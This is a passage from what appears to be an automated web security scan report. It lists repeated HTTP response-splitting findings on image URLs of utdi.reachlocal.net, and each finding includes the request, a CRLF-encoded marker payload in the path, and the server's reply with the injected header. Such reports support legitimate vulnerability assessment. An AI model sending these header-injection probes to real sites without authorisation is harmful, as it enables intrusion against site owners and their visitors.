HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:40 GMT
Server: Apache
Location: http://utdi.com/ac19a
7030fac53e2
/navbutton_about-ovr.jpg
Vary: Accept-Encoding
Content-Length: 311
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:32 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/ac19a
7030fac53e2/navbutton_ab
...[SNIP]...

1.33. http://utdi.reachlocal.net/images/navbutton_about.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_about.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 564c7%0d%0ae0db7ba9b90 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /564c7%0d%0ae0db7ba9b90/navbutton_about.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:41 GMT
Server: Apache
Location: http://utdi.com/564c7
e0db7ba9b90
/navbutton_about.jpg
Vary: Accept-Encoding
Content-Length: 307
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:33 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/564c7
e0db7ba9b90/navbutton_ab
...[SNIP]...

1.34. http://utdi.reachlocal.net/images/navbutton_client-ovr.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_client-ovr.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d5ca8%0d%0abf51af5b896 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /d5ca8%0d%0abf51af5b896/navbutton_client-ovr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:39 GMT
Server: Apache
Location: http://utdi.com/d5ca8
bf51af5b896
/navbutton_client-ovr.jpg
Vary: Accept-Encoding
Content-Length: 312
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:32 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/d5ca8
bf51af5b896/navbutton_cl
...[SNIP]...

1.35. http://utdi.reachlocal.net/images/navbutton_client.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_client.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 37f02%0d%0ab42a12b1bbf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /37f02%0d%0ab42a12b1bbf/navbutton_client.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:45 GMT
Server: Apache
Location: http://utdi.com/37f02
b42a12b1bbf
/navbutton_client.jpg
Vary: Accept-Encoding
Content-Length: 308
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:37 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/37f02
b42a12b1bbf/navbutton_cl
...[SNIP]...

1.36. http://utdi.reachlocal.net/images/navbutton_contact-ovr.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_contact-ovr.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7f0e7%0d%0a7c06fd67eb5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7f0e7%0d%0a7c06fd67eb5/navbutton_contact-ovr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:34 GMT
Server: Apache
Location: http://utdi.com/7f0e7
7c06fd67eb5
/navbutton_contact-ovr.jpg
Vary: Accept-Encoding
Content-Length: 313
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:27 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/7f0e7
7c06fd67eb5/navbutton_co
...[SNIP]...

1.37. http://utdi.reachlocal.net/images/navbutton_contact.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_contact.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d419b%0d%0a6740deaef7b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /d419b%0d%0a6740deaef7b/navbutton_contact.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:42 GMT
Server: Apache
Location: http://utdi.com/d419b
6740deaef7b
/navbutton_contact.jpg
Vary: Accept-Encoding
Content-Length: 309
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:35 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/d419b
6740deaef7b/navbutton_co
...[SNIP]...

1.38. http://utdi.reachlocal.net/images/navbutton_products-ovr.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_products-ovr.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 355c6%0d%0a88702d4c646 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /355c6%0d%0a88702d4c646/navbutton_products-ovr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:39 GMT
Server: Apache
Location: http://utdi.com/355c6
88702d4c646
/navbutton_products-ovr.jpg
Vary: Accept-Encoding
Content-Length: 314
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7c45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:31 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/355c6
88702d4c646/navbutton_pr
...[SNIP]...

1.39. http://utdi.reachlocal.net/images/navbutton_products.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_products.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 789fe%0d%0a5615b38ed3b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /789fe%0d%0a5615b38ed3b/navbutton_products.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:47 GMT
Server: Apache
Location: http://utdi.com/789fe
5615b38ed3b
/navbutton_products.jpg
Vary: Accept-Encoding
Content-Length: 310
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7e45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:39 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/789fe
5615b38ed3b/navbutton_pr
...[SNIP]...

1.40. http://utdi.reachlocal.net/images/navbutton_projects-ovr.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_projects-ovr.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6907f%0d%0a53622b16624 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6907f%0d%0a53622b16624/navbutton_projects-ovr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:38 GMT
Server: Apache
Location: http://utdi.com/6907f
53622b16624
/navbutton_projects-ovr.jpg
Vary: Accept-Encoding
Content-Length: 314
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:30 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/6907f
53622b16624/navbutton_pr
...[SNIP]...

1.41. http://utdi.reachlocal.net/images/navbutton_projects.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_projects.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ad123%0d%0aeb18754afb7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /ad123%0d%0aeb18754afb7/navbutton_projects.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:43 GMT
Server: Apache
Location: http://utdi.com/ad123
eb18754afb7
/navbutton_projects.jpg
Vary: Accept-Encoding
Content-Length: 310
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:35 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/ad123
eb18754afb7/navbutton_pr
...[SNIP]...

1.42. http://utdi.reachlocal.net/images/navbutton_services-ovr.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_services-ovr.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4acb8%0d%0ab541b30dd04 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4acb8%0d%0ab541b30dd04/navbutton_services-ovr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:37 GMT
Server: Apache
Location: http://utdi.com/4acb8
b541b30dd04
/navbutton_services-ovr.jpg
Vary: Accept-Encoding
Content-Length: 314
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:30 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/4acb8
b541b30dd04/navbutton_se
...[SNIP]...

1.43. http://utdi.reachlocal.net/images/navbutton_services.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_services.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 35525%0d%0a72310b3416a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /35525%0d%0a72310b3416a/navbutton_services.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:47 GMT
Server: Apache
Location: http://utdi.com/35525
72310b3416a
/navbutton_services.jpg
Vary: Accept-Encoding
Content-Length: 310
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:39 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/35525
72310b3416a/navbutton_se
...[SNIP]...

1.44. http://utdi.reachlocal.net/images/partner-logos-avaya.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/partner-logos-avaya.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3b074%0d%0ae845103065b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3b074%0d%0ae845103065b/partner-logos-avaya.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:28 GMT
Server: Apache
Location: http://utdi.com/3b074
e845103065b
/partner-logos-avaya.jpg
Vary: Accept-Encoding
Content-Length: 311
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:21 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/3b074
e845103065b/partner-logo
...[SNIP]...

1.45. http://utdi.reachlocal.net/images/partner-logos-sonexis.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/partner-logos-sonexis.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d9d65%0d%0a27fb644bc97 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /d9d65%0d%0a27fb644bc97/partner-logos-sonexis.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:17 GMT
Server: Apache
Location: http://utdi.com/d9d65
27fb644bc97
/partner-logos-sonexis.jpg
Vary: Accept-Encoding
Content-Length: 313
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:10 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/d9d65
27fb644bc97/partner-logo
...[SNIP]...

1.46. http://utdi.reachlocal.net/images/productpic_avaya1.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/productpic_avaya1.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 36765%0d%0acd72234d30c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /36765%0d%0acd72234d30c/productpic_avaya1.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
